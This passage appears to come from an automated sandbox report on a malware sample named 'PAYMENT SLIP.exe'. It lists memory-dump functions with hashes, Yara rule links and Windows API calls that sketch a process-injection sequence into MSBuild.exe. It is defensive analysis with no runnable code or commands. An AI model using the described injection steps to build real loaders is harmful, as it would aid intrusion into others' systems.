              • Opcode Fuzzy Hash: 746dfd423c3205dc2a6ab8721a0cf1fa200514087bf038774af60f58ebf9af94
              • Instruction Fuzzy Hash: B701D6207042650FCB16767D54212BEA78B6FD6549758845EE006EF3C1CD69BC0783D6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D605CF, Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf65b864b5c5bdddd9f55704e44f89ad8a617d5a8c3fbcb24a836c2fd8913b70
              • Instruction ID: 0791bc87795a93f70d854fd5ad073a91083bcf063ddadd0af2183d7be146ce33
              • Opcode Fuzzy Hash: cf65b864b5c5bdddd9f55704e44f89ad8a617d5a8c3fbcb24a836c2fd8913b70
              • Instruction Fuzzy Hash: A901A7765097805FD7128F16EC40862FFB8EE46620709C59FEC8987611D125B909CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D205C8, Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 852fb88c59078d67f2c90d1062e6e68a34e76f7e3f779abfc032f648f17e4f70
              • Instruction ID: 73f828d6a895fef60a6510e2e32ae80b6f7be007c5643148d115706e6d064381
              • Opcode Fuzzy Hash: 852fb88c59078d67f2c90d1062e6e68a34e76f7e3f779abfc032f648f17e4f70
              • Instruction Fuzzy Hash: 6FF096307001344BCA19767D54116BFA28BABD5989768842EE106EF3C4CD68BC0743D6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D6086D, Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 015a52d740c72f9d821adfc2e1db239466bd70e5f617f125c37b0ecb66c57b46
              • Instruction ID: c1b52ba86254662ff96f3888e5f7d8d00dacf3a72f52d09fcecda91fcf071081
              • Opcode Fuzzy Hash: 015a52d740c72f9d821adfc2e1db239466bd70e5f617f125c37b0ecb66c57b46
              • Instruction Fuzzy Hash: 771130351492848FD706CB10C554B25BBB2BB56718F28C6EED8894B752C33A9817DB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D21218, Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b39d3d8ed04072962dbe61ab71918667b498a5a9a508aca94d6ae4578f620900
              • Instruction ID: 5507e46016a364926a4835ec5bd02a573c113ebb4623b7d48485b16ffca80993
              • Opcode Fuzzy Hash: b39d3d8ed04072962dbe61ab71918667b498a5a9a508aca94d6ae4578f620900
              • Instruction Fuzzy Hash: B8011230314160CBC7049B28D05896A77E6FFD5644B24C1AAF54ACB7A5CF75DC09CB85
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D24180, Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9861234e21ca3a8c2aee118626f7f81e824ba079b95b842f08eef312c4d940c6
              • Instruction ID: 46832bd4ffb78fd393575bd6f4919d5aa95592d262c63ca9c26fa300f9779acb
              • Opcode Fuzzy Hash: 9861234e21ca3a8c2aee118626f7f81e824ba079b95b842f08eef312c4d940c6
              • Instruction Fuzzy Hash: 8AF027716093749FCB226A70684A4BE7F78AEE3198B0201BBEC42D2141E6758809C762
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D60638, Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dfaf4033514462f8d478724a79747788077e7ed84409ab42b2e3d6ab70ed2fc1
              • Instruction ID: 27c40d7bd15ac3de2a0115917066dccaf1157e7c3e01167f8df7597c1c04c1c4
              • Opcode Fuzzy Hash: dfaf4033514462f8d478724a79747788077e7ed84409ab42b2e3d6ab70ed2fc1
              • Instruction Fuzzy Hash: 17F0A77664D3804FD3078B15BC559B17FA0EB82221B1981FBC84ACA263D515A949CB66
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D20908, Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a166d4782d332f50543df17b11deccc825da346a7255ddfbf6548ee5388830c5
              • Instruction ID: 9463f3352ca3bd0742fe574b45d4404be347482948c9b20e96034606c7886aaa
              • Opcode Fuzzy Hash: a166d4782d332f50543df17b11deccc825da346a7255ddfbf6548ee5388830c5
              • Instruction Fuzzy Hash: 0EF0E2306193A89FD7501AB448242BF7FE98B7B205B0A44AB8C83AB341C8689C0AC291
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D20918, Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7583ab6dcf991f8cb20c9864550edc478e281a28bfe8c02ce868c20a5dd9bbd9
              • Instruction ID: 735bbcfc53a3ce5598202183202f639aac35c145eb819a2919281ec2c8346a02
              • Opcode Fuzzy Hash: 7583ab6dcf991f8cb20c9864550edc478e281a28bfe8c02ce868c20a5dd9bbd9
              • Instruction Fuzzy Hash: 16E0E532A19338DADB105AF998041AFB7AD97B525AF044437DD47A3304D974CC09C2D2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D60938, Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
              • Instruction ID: 58a9cf0cbdee9a73fcbffde386245e7bf75bc574fd94dc9908aa1fa94fcf6ca2
              • Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
              • Instruction Fuzzy Hash: 6BF03135104644DFC306DF04D544B25FBA2FB89718F24C6ADE9890B752C337D813DA81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D605F6, Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8bc49b9d00c598121aaf8939c2bfab4f1fdded152098983b3098e46ef24e3d55
              • Instruction ID: e84238cf43683400e67091d8385c68d7026ba33ef06e1ac1a88bf760f2ffdef7
              • Opcode Fuzzy Hash: 8bc49b9d00c598121aaf8939c2bfab4f1fdded152098983b3098e46ef24e3d55
              • Instruction Fuzzy Hash: 90E06D76A406045BD650CF0AFC81452FBD8EB88630718C06BDC0E8B700E535B5048EA6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D202A0, Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 11192804267d77b063f5718e5ee3fa985ad0dc4a7a7728b163c87508e9680c22
              • Instruction ID: 5d81c060f5069012d360e9f77317630cbaf84e3e511cf3ce2c5310eddc7b1b39
              • Opcode Fuzzy Hash: 11192804267d77b063f5718e5ee3fa985ad0dc4a7a7728b163c87508e9680c22
              • Instruction Fuzzy Hash: 71E0C2704097948BC7215664A4668A17FF0BF6A708306898BE48ACBA1AC620EC05C721
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D2064F, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ffad36349b29458169c362bb08ce9c90de4df5e888be4dba23b3745080456225
              • Instruction ID: bda87d8d01260cba2bdb5479e366bd89da66a9a58c67dbdd18ef5e4ba50ee217
              • Opcode Fuzzy Hash: ffad36349b29458169c362bb08ce9c90de4df5e888be4dba23b3745080456225
              • Instruction Fuzzy Hash: B9D0A77244D3E08FC3151BB0181A1F53FA5DFB330A71488EED88046D22853A7997E712
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D22D20, Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c14169d282fddcaec8431d2c8e2b0ddf34646b0713567de1976a8727f3b8aa9
              • Instruction ID: 6946f158ed3e0fb50b38981d7a8de3db80e4a2e2dad364752c34c243c272dc6e
              • Opcode Fuzzy Hash: 2c14169d282fddcaec8431d2c8e2b0ddf34646b0713567de1976a8727f3b8aa9
              • Instruction Fuzzy Hash: D7D05E7004E3E89ED72216A458297B07F38DB2F30DF0905D7F5CA8C1A7C041D90AC792
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012023F4, Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.744739420.0000000001202000.00000040.00000001.sdmp, Offset: 01202000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0711734dc90c6db1f5aeff9233a20c8584dcf20a6fb366c7b3b8c6a5951d23bf
              • Instruction ID: b4c2d41b90db7f63be0bb0ed847186f894d2631c1e91639f8e84dbb6ff1e89c2
              • Opcode Fuzzy Hash: 0711734dc90c6db1f5aeff9233a20c8584dcf20a6fb366c7b3b8c6a5951d23bf
              • Instruction Fuzzy Hash: AED05E79215AA28FE3278A1CC1A8B953FE4EB51B04F4744FAE9008B6A7C369D681D200
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012023BC, Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.744739420.0000000001202000.00000040.00000001.sdmp, Offset: 01202000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16179fd1d395c0738f75329b5b0484beb9c166e22cb2163a105008596a837880
              • Instruction ID: c85694a1be671205184b7c9a85682b81a639fe5ae3bf946175221c8ae2da0411
              • Opcode Fuzzy Hash: 16179fd1d395c0738f75329b5b0484beb9c166e22cb2163a105008596a837880
              • Instruction Fuzzy Hash: C5D05E342102828BDB16DB0CD198F593BD4AB41B00F0644E9BE008B2A6C7B4D881C600
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D20180, Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31aadd0f6f50c1c12079d81d867103a6cd43bbf1e9d55ae9e69723877bb7d04d
              • Instruction ID: d2b1750f3082f8f5d89595afc0a1258986b6189d9ffb3c81dd0f6ac7dc535bab
              • Opcode Fuzzy Hash: 31aadd0f6f50c1c12079d81d867103a6cd43bbf1e9d55ae9e69723877bb7d04d
              • Instruction Fuzzy Hash: A2D0C970200304CFCB282F70A41A41877AAAF88305B50087DD80687744DE3AE841CA44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D22EC0, Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cb9c39db5c8aa30c03402a0a1877881d925f3ab5612e83044c9e8235aa8aa34
              • Instruction ID: 5b07970a69baf207b16bca9bac00fd5437886fa424d0d1ce7312dcb589d086e7
              • Opcode Fuzzy Hash: 3cb9c39db5c8aa30c03402a0a1877881d925f3ab5612e83044c9e8235aa8aa34
              • Instruction Fuzzy Hash: 85B092312542180BEB60AAB67848B66338C978071DF5400A9F80CC5A00E64AE8E07240
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D20660, Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 29fb55cec8528e883eaffbdabc4885fff6d6943812c43adef34fe0d96e2c85be
              • Instruction ID: 61cfec3f5e4612246739916dcb6518da7a7a7cb3d3f66ebcc161d3957b1638ac
              • Opcode Fuzzy Hash: 29fb55cec8528e883eaffbdabc4885fff6d6943812c43adef34fe0d96e2c85be
              • Instruction Fuzzy Hash: E8C09B710462F4CFC2746A715805439721DABF130F750C439D541006258A76FC56DE55
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: PAYMENT SLIP.exe PID: 6900 Parent PID: 5704 PAYMENT SLIP.exeCOMMON

              Executed Functions

              Function 022B1450, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 461memoryfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 022B126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 022B128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 022B18E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 022B1960
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: a239aaeaf12639b54c0a2e14ef7bc70aa0979e8a349e13b872bd31a02f92ba11
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: 73024A25E54398E9EF61CBE4EC15BEDB7B5AF04B10F10448AE608FA1D1D3B50A84DF16
              Uniqueness

              Uniqueness Score: -1.00%

              Function 022B0950, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 022B0A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 022B0C1F
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: 04f25035bd13f62d2e23a8e5d854e52d070a262f04201d029489d2c273888e5a
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: 97A1FF30D20209EFDF12CFE4C985BEEBBB1AF08355F20855AE610BA2A4D3759A41DF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 022B1A70, Relevance: 9.1, APIs: 6, Instructions: 118fileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 022B1BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 022B1BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 022B1B25
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction ID: d19ca909b9543323c600533394ae898a6695f04c9de35aa6003266e36d802a82
              • Opcode Fuzzy Hash: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction Fuzzy Hash: 19410330D60209FEEF12AFE4CD05BEDBAB1EF04352F2085A4E915B90A4E7B14A61DF10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 022B0034, Relevance: 6.7, APIs: 4, Instructions: 727processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 022B05BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 022B05E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 022B0605
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadThread
              • String ID:
              • API String ID: 2411489757-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: a0a7670257ec6a2aa11197601649d501f122ff8c13e81af4836db6e46e15dd0e
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: AF52FA35E60358EEEB61CBE4EC55BFDB7B5AF48710F105496E608EA2A0D3B05A80DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 022B1BDE, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 022B1BFF
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction ID: e70bbef02eb487d8365198eabfeb5684d6e5702ad46b126ff8318101e19567eb
              • Opcode Fuzzy Hash: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction Fuzzy Hash: EAF0F870C10209EFDB05AFE4C8086ECBB70EF00355F1086A5E82466295D7714AA1DB85
              Uniqueness

              Uniqueness Score: -1.00%

              Function 022B126A, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 022B128F
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 0987426fc96da581a774c6f2b7dcc4f30861dd9ab51fe7178ec3c06e76cb4799
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: 99D017B1C60308BFCB05EBE0C94689DBB6DDF01341F10829AAC00AA151DA759A109A94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: MSBuild.exe PID: 6948 Parent PID: 6900 MSBuild.exeCOMMON

              Executed Functions

              Function 050D2D58, Relevance: 2.6, Strings: 2, Instructions: 135COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              • Opcode ID: 73e6198fcac80cdab9f1256db1ddaf920d7daa7e0781f6c18873fda5ee31eb87
              • Instruction ID: 2d4b0c38a60d072e6bfdab762eebd2c309853821e7f9dfecad91b446baafd112
              • Opcode Fuzzy Hash: 73e6198fcac80cdab9f1256db1ddaf920d7daa7e0781f6c18873fda5ee31eb87
              • Instruction Fuzzy Hash: 2F41B038E143268BCB60CF69D8805BEF7B3BBC1218B25C56AC416DB605C631E8528BA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121AA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0121AAB1
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 74de2a2358a8eea11ed22629b1e010fb109885dc66f8d181f2a79fb6643feda2
              • Instruction ID: d6f87bf79e7281fa34b59ea6638e3bc1f189f1cb4ab7aa433c8b06b6a1429f82
              • Opcode Fuzzy Hash: 74de2a2358a8eea11ed22629b1e010fb109885dc66f8d181f2a79fb6643feda2
              • Instruction Fuzzy Hash: A53191B25443846FE7228B25CC45FA7BFECEF05310F0884AAE9859B152D264E949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121AAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,BF781A32,00000000,00000000,00000000,00000000), ref: 0121ABB4
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 35aaf8b0a9f924f7f12864816fbd2a76555c4a2a7757ef7c514d313d85c6dc25
              • Instruction ID: 66af814a247ab6c18c22d22ce279b4a33b1930dc8f149197e381d57c1b884d33
              • Opcode Fuzzy Hash: 35aaf8b0a9f924f7f12864816fbd2a76555c4a2a7757ef7c514d313d85c6dc25
              • Instruction Fuzzy Hash: 893191711093C46FE722CF25CC44FA2BFE8EF16320F18889AE9858B153D264E548CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121AF50, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
              Download Yara Rule
              APIs
              • SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 0121AFEA
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: ConsoleCtrlHandler
              • String ID:
              • API String ID: 1513847179-0
              • Opcode ID: fc2ddb4b5f0a8c442990319dfeb0e3298f8415822b33b19d735f62277f1b7f72
              • Instruction ID: ed752f0e53bd211afbc2f251102fb9638c0c26b90ecb0a97128a9be1ee0eda10
              • Opcode Fuzzy Hash: fc2ddb4b5f0a8c442990319dfeb0e3298f8415822b33b19d735f62277f1b7f72
              • Instruction Fuzzy Hash: F621A47144E3C06FD3138B259C51B61BFB8EF87620F0A41DBE984CB5A3D129A919C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121AA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0121AAB1
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: d7d1041d346f7f88b33e014e472eb7c2e7be96de09686a4956504188491d473c
              • Instruction ID: 0640c43d58818732bd1646e1c37f295dec6edc5b64ddea89ecb4a562d9be59d9
              • Opcode Fuzzy Hash: d7d1041d346f7f88b33e014e472eb7c2e7be96de09686a4956504188491d473c
              • Instruction Fuzzy Hash: 0B21CF72500344AEE721CE29CD85F6AFBECEF18320F04845AEA459B646E674E509CAB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121AB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,BF781A32,00000000,00000000,00000000,00000000), ref: 0121ABB4
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 081a725728abc936b7d694878d412d0d6d97c172b4f825994d5110267c5b945c
              • Instruction ID: 7a5415180a45433d36f4b6a690bf1230c70c9200dc612cd51e38fd1360a43442
              • Opcode Fuzzy Hash: 081a725728abc936b7d694878d412d0d6d97c172b4f825994d5110267c5b945c
              • Instruction Fuzzy Hash: C6218171601384AFE721CE29CC45F66FBECFF24710F14886AEA458B656E764E504CA71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121A51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0121A58A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: d8002fcbfe210af9a3a59cf50e82c99c9714973e440c99ff19c13b9fe661f6df
              • Instruction ID: b2c681b4969fd96eb3669db7f68b548044df6cb494d1106b0d913d16e50c0294
              • Opcode Fuzzy Hash: d8002fcbfe210af9a3a59cf50e82c99c9714973e440c99ff19c13b9fe661f6df
              • Instruction Fuzzy Hash: B5117271409380AFDB228F55DC44B62FFF4EF4A210F0884DAED858B553D375A418DB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121B7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121B841
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 520e0177e98b597f124dc7eddec7ddb4d8a3a62886b45de08acf55093ee4a4fb
              • Instruction ID: 2dc0d2077387bb04ea14a045f7a80d60a69dfdae7bad15833c2bd6a2ebebe103
              • Opcode Fuzzy Hash: 520e0177e98b597f124dc7eddec7ddb4d8a3a62886b45de08acf55093ee4a4fb
              • Instruction Fuzzy Hash: 46216D714097C09FDB128B25DC50A92BFB0AF16314F0D84DAED844F563D265A958DB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121BB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121BBB9
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 698cb4321f3796e856e392f9017badaa7bb18ac747409d9d47f6a5e49038332e
              • Instruction ID: 41282128cd5023cb5375e9148edc153740933626e4305d58c8b12280329c445f
              • Opcode Fuzzy Hash: 698cb4321f3796e856e392f9017badaa7bb18ac747409d9d47f6a5e49038332e
              • Instruction Fuzzy Hash: 1411BE354093C0AFDB228F25CC85B52FFB4EF16220F0884DEED858B563D265A818CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0121BE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
              Download Yara Rule
              APIs
              • DispatchMessageW.USER32(?), ref: 0121BE70
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: c0114dcacd0377bd35064240e89a24cfb6271cc2f8ff00610d2f4e12e0ecacaf
              • Instruction ID: c55c469f66a94c65f9a46a84ba7f3df3e370a79e306d6113ea404faf5a6928cb
              • Opcode Fuzzy Hash: c0114dcacd0377bd35064240e89a24cfb6271cc2f8ff00610d2f4e12e0ecacaf
              • Instruction Fuzzy Hash: FD117C758093C0AFDB138B25DC84B61BFB4DF57624F0984DBED848F263D2656808CB62
              Uniqueness

